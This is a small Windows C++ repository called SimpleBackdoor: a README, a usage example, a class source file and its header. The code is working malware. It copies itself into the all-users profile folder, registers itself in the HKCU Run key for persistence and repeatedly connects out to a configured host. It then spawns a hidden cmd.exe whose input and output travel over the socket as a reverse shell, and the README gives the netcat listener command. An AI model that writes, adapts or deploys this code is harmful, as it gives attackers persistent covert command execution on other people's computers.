├── .gitignore
├── README.md
├── main.cpp
├── simplebackdoor.cpp
└── simplebackdoor.h


/.gitignore:
--------------------------------------------------------------------------------
1 | *.cbp
2 | *.depend
3 | *.layout
4 | bin/
5 | obj/
6 | 
7 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | SimpleBackdoor
2 | ==============
3 | 
4 | Opens a persistent TCP remote shell exchanging command information through TCP.
5 | 
6 | Any TCP server can be used to send and receive commands on the server.
7 | 
8 | Server side listenning with netcat: nc -l -p listenport -v
9 | 


--------------------------------------------------------------------------------
/main.cpp:
--------------------------------------------------------------------------------
 1 | /*
 2 | SimpleBackdoor usage example
 3 | */
 4 | 
 5 | #include "simplebackdoor.h"
 6 | 
 7 | int main(int argc, char **argv)
 8 | {
 9 |     SimpleBackdoor* door = SimpleBackdoor::getInstance();
10 | 
11 |     std::string programName(argv[0]);
12 |     programName = programName.substr(programName.find_last_of("\\")+1);
13 |     door->persist(programName);
14 | 
15 |     while (1) {
16 |         door->connectToServer("127.0.0.1", "1337");
17 |         door->doShell();
18 |     }
19 | 
20 |     return 0;
21 | }
22 | 


--------------------------------------------------------------------------------
/simplebackdoor.cpp:
--------------------------------------------------------------------------------
  1 | #include "simplebackdoor.h"
  2 | 
  3 | using namespace std;
  4 | 
  5 | SimpleBackdoor* SimpleBackdoor::instance = NULL;
  6 | 
  7 | SimpleBackdoor::SimpleBackdoor() {
  8 |     //uncomment to hide the program's console
  9 |     //ShowWindow(GetConsoleWindow(), SW_HIDE);
 10 | }
 11 | 
 12 | SimpleBackdoor::~SimpleBackdoor() {
 13 |     closesocket(connectSocket);
 14 |     WSACleanup();
 15 | }
 16 | 
 17 | void SimpleBackdoor::log(std::string line) {
 18 |     cout << line << endl;
 19 | }
 20 | 
 21 | void SimpleBackdoor::connectToServer(std::string ip, std::string port) {
 22 | 
 23 |     WSADATA wsaData;
 24 |     if(WSAStartup(MAKEWORD(2,2), &wsaData) != 0) {
 25 |         exit(1);
 26 |     }
 27 | 
 28 |     struct addrinfo *info, hints;
 29 |     ZeroMemory(&hints, sizeof(hints));
 30 |     hints.ai_family = AF_INET;
 31 |     hints.ai_socktype = SOCK_STREAM;
 32 |     hints.ai_protocol = IPPROTO_TCP;
 33 | 
 34 |     if(getaddrinfo(ip.c_str(), port.c_str(), &hints, &info) != 0){
 35 |         WSACleanup();
 36 |         exit(1);
 37 |     }
 38 | 
 39 |     connectSocket = INVALID_SOCKET;
 40 |     connectSocket = socket(info->ai_family, info->ai_socktype, info->ai_protocol);
 41 | 
 42 |     if (connectSocket == INVALID_SOCKET) {
 43 |         WSACleanup();
 44 |         exit(1);
 45 |     }
 46 | 
 47 |     log("Connecting to server...");
 48 |     while (connect(connectSocket, info->ai_addr, (int)info->ai_addrlen) == SOCKET_ERROR) {
 49 |         Sleep(10000);
 50 |     }
 51 | 
 52 |     freeaddrinfo(info);
 53 | 
 54 |     if(connectSocket == INVALID_SOCKET) {
 55 |         WSACleanup();
 56 |         exit(1);
 57 |     }
 58 | }
 59 | 
 60 | void SimpleBackdoor::doShell() {
 61 | 
 62 |     SECURITY_ATTRIBUTES saAttr;
 63 |     HANDLE readIN = NULL;
 64 |     HANDLE writeIN = NULL;
 65 |     HANDLE readOUT = NULL;
 66 |     HANDLE writeOUT = NULL;
 67 | 
 68 |     size_t received;
 69 |     char recvBuffer[RECV_BUFLEN];
 70 | 
 71 |     saAttr.nLength = sizeof(SECURITY_ATTRIBUTES);
 72 |     saAttr.bInheritHandle = TRUE;
 73 |     saAttr.lpSecurityDescriptor = NULL;
 74 | 
 75 |     CreatePipe(&readOUT, &writeOUT, &saAttr, 0);
 76 |     CreatePipe(&readIN, &writeIN, &saAttr, 0);
 77 | 
 78 |     PROCESS_INFORMATION piProcInfo;
 79 |     STARTUPINFO siStartInfo;
 80 | 
 81 |     ZeroMemory( &piProcInfo, sizeof(PROCESS_INFORMATION) );
 82 |     ZeroMemory( &siStartInfo, sizeof(STARTUPINFO) );
 83 | 
 84 |     siStartInfo.cb = sizeof(STARTUPINFO);
 85 |     siStartInfo.hStdError = writeOUT;
 86 |     siStartInfo.hStdOutput = writeOUT;
 87 |     siStartInfo.hStdInput = readIN;
 88 |     siStartInfo.dwFlags |= STARTF_USESTDHANDLES;
 89 |     siStartInfo.wShowWindow = SW_HIDE;
 90 | 
 91 |     CreateProcess(NULL,
 92 |         "cmd.exe",
 93 |         NULL,
 94 |         NULL,
 95 |         TRUE,
 96 |         0,
 97 |         NULL,
 98 |         NULL,
 99 |         &siStartInfo,
100 |         &piProcInfo);
101 | 
102 |     log("Started cmd.exe");
103 | 
104 |     char cmdBuffer[CMD_BUFLEN];
105 |     DWORD read;
106 |     DWORD bwritten;
107 | 
108 |     do {
109 |         Sleep(1000);
110 |         do {
111 |             ReadFile(readOUT, cmdBuffer, CMD_BUFLEN, &read, NULL);
112 |             send(connectSocket, cmdBuffer, read, 0);
113 |             PeekNamedPipe(readOUT, cmdBuffer, sizeof(cmdBuffer), &read, NULL, NULL);
114 |         } while(read > 0);
115 |         ZeroMemory(recvBuffer, RECV_BUFLEN);
116 |         received = recv(connectSocket, recvBuffer, RECV_BUFLEN, 0);
117 |         WriteFile(writeIN, recvBuffer, received, &bwritten, NULL);
118 | 
119 |     } while (received > 0);
120 | 
121 |     if(received == 0) {
122 |         log("disconnected");
123 |     }
124 | 
125 |     else {
126 |         log("recv failed: " + WSAGetLastError());
127 |     }
128 | }
129 | 
130 | void SimpleBackdoor::persist(std::string programName) {
131 | 
132 |     char path[500];
133 |     int firstLaunch;
134 | 
135 |     GetEnvironmentVariable("ALLUSERSPROFILE", path, sizeof(path));
136 |     strcat(path, "\\");
137 |     strcat(path, programName.c_str());
138 | 
139 |     firstLaunch = CopyFile(programName.c_str(), path, 1);
140 |     log("Checking " + std::string(path) + "...");
141 | 
142 |     if(firstLaunch) {
143 |         HKEY key;
144 |         RegOpenKey(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", &key);
145 |         RegSetValueEx(key, programName.c_str(), 0, REG_SZ, (BYTE*)path, strlen(path));
146 |         log("Added registry key.");
147 |     }
148 | }
149 | 
150 | SimpleBackdoor* SimpleBackdoor::getInstance() {
151 | 
152 | 
153 | 
154 |     if(!instance) {
155 |         instance = new SimpleBackdoor();
156 |     }
157 | 
158 |     return instance;
159 | }
160 | 


--------------------------------------------------------------------------------
/simplebackdoor.h:
--------------------------------------------------------------------------------
 1 | /*
 2 | Class SimpleBackdoor
 3 | 
 4 | opens a remote shell on a windows machine.
 5 | */
 6 | 
 7 | #ifndef H_SIMPLEBACKDOOR
 8 | #define H_SIMPLEBACKDOOR
 9 | 
10 | #define _WIN32_WINNT 0x501
11 | #include <winsock2.h>
12 | #include <ws2tcpip.h>
13 | #include <iostream>
14 | 
15 | #define RECV_BUFLEN 512
16 | #define CMD_BUFLEN 4096
17 | 
18 | class SimpleBackdoor {
19 | 
20 |     SimpleBackdoor();
21 | 
22 |     static SimpleBackdoor* instance;
23 | 
24 |     SOCKET connectSocket;
25 | 
26 |     void log(std::string line);
27 | 
28 | public:
29 | 
30 |     ~SimpleBackdoor();
31 | 
32 |     static SimpleBackdoor* getInstance();
33 | 
34 |     //tries to connect to the server until it succeeds
35 |     void connectToServer(std::string ip, std::string port);
36 | 
37 |     //opens a remote shell to the servers
38 |     void doShell();
39 | 
40 |     //copies the exe file and adds registry key to be launched at startup
41 |     void persist(std::string programName);
42 | };
43 | 
44 | #endif
45 | 


--------------------------------------------------------------------------------